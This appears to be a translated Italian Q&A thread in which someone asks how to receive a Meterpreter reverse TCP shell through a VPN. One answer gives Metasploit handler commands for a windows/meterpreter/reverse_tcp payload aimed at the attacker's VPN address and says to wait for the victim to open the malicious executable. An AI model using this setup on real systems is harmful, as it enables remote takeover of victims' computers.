Meterpreter session over VPN

5

Ho la seguente situazione:

Macchina attaccante collegata a un router con IP pubblico assegnato dall'ISP, inoltro abilitato.

Macchina vittima connessa ad un altro router, (ovviamente) diverso IP assegnato da ISP diverso.

Voglio stabilire una sessione meterpreter con reverse tcp. Creo un file eseguibile payload con msfvenom fornendo l'IP pubblico del router attacker come parametro LHOST, quindi avvio il listener impostando l'IP locale della macchina attacker come LHOST.

Fino a qui nessun problema.

Ho provato a fare lo stesso con la macchina attacker collegata a un server VPN creato autonomamente senza successo. È possibile farlo?

Se sì, quali indirizzi IP devo impostare sia nel payload che nell'ascoltatore per farlo funzionare?

    
posta MKay 31.03.2016 - 15:48
fonte

2 risposte

2

Se si utilizza una shell inversa, è necessario impostare LHOST con l'IP VPN del pirata informatico, non con il proprio IP LAN interno. Inoltre, è necessario ascoltare localmente con Metasploit su una porta specifica da impostare su LPORT e che deve essere uguale a msfvenom (es. 443). Per ottenere ciò puoi usare:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit

Quindi aspetta che la vittima apra il tuo file eseguibile dannoso

    
risposta data 31.03.2016 - 20:22
fonte
0

Sì, è possibile se stai usando openvpn. È possibile impostare un DMZ. Openvpn ha la capacità di farlo. Un IP pubblico VPN può inoltrare le porte ai propri client se configurato con dmz. Dovresti impostare l'IP della tua VPN e non il tuo IP del client interno come LHOST

    
risposta data 31.03.2016 - 20:14
fonte

Leggi altre domande sui tag